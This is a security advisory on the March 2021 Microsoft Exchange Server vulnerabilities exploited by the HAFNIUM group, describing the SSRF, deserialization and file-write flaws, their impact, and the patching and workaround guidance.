State Sponsored Attackers Targeting Microsoft Exchange Vulnerabilities

Overview

Microsoft urges Exchange users to patch the servers immediately as multiple threat actors, including state sponsored attackers are actively exploiting multiple critical vulnerabilities patched recently.

Description

Microsoft warns of increased attacks exploiting unpatched Exchange Servers that contain multiple critical vulnerabilities. Microsoft released emergency patches on March 2, 2021, immediately after the security flaws were discovered since they are targeted by state sponsored attackers.

Among the vulnerabilities, CVE-2021-26855, a Server-Side Request Forgery (SSRF) vulnerability is highly critical as it provides attackers with an initial attack vector via bypassing server authentication. This initial exploitation requires untrusted connection to Exchange server over port 443. After successfully authenticating to the Exchange server, attackers could exploit the three other critical post-authentication vulnerabilities (CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).

CVE-2021-26857 is an Insecure Deserialization vulnerability that allows attackers to run arbitrary code as SYSTEM on the Exchange server. The other two post-authentication vulnerabilities (CVE-2021-26858, CVE-2021-27065) allow attackers to write arbitrary file on any path on the server.

As reported by Microsoft, a state sponsored hacker group that is known to be operating out of China, HAFNIUM, has been exploiting the vulnerabilities actively. According to the threat intelligence report, some of the threat actors are known to have deployed web shells for persisting the initial exploits. Microsoft also expects attacks to continue in an increasing rate as automated exploits targeting the discovered vulnerabilities are developed by threat actors.

Note that the vulnerabilities affect only on-premises servers (Exchange Server 2013, 2016, and 2019) and Exchange Online is not affected.

Impact

An attacker who successfully exploits the CVE-2021-26855 by establishing an untrusted connection to the Exchange server over port 443 could execute arbitrary code and bypass authentication to the server.

An attacker who successfully exploits the CVE-2021-26857 vulnerability could run arbitrary code as SYSTEM on the Exchange server via Insecure Deserialization.

An attacker who successfully exploits the CVE-2021-26858 and CVE-2021-27065 vulnerabilities could write arbitrary file on any path on the Exchange server.

Solution (Update/Workaround)

To defend against possible attacks due to the announced vulnerabilities, Exchange Servers 2013, 2016 and 2019 should updated according to the Microsoft Security Response Center guidance.

Also, workarounds could be applied for the foothold vulnerability CVE-2021-26855. Since this vulnerability requires untrusted connection over port 443, mitigations such as restricting untrusted connections or using a VPN to connect to the Exchange server could be applied.

Cyber war takes place largely in secret, unknown to the general public on both sides.

Noah Feldman

Read more educational and inspirational cyber quotes at our page 100+ Best Cyber Security & Hacker Quotes.

References to Advisories, Solutions and Tools

• Microsoft Security Response Center (Multiple Security Updates Released for Exchange Server)
• Microsoft Security Update Guide (CVE-2021-26855)
• Microsoft Security Update Guide (CVE-2021-26857)
• Microsoft Security Update Guide (CVE-2021-26858)
• Microsoft Security Update Guide (CVE-2021-27065)
• NVD (CVE-2021-26855)
• NVD (CVE-2021-26857)
• NVD (CVE-2021-26858)
• NVD (CVE-2021-27065)

To learn more about security vulnerabilities, you could also read our articles What is a Security Vulnerability? or What is Vulnerability Scanning?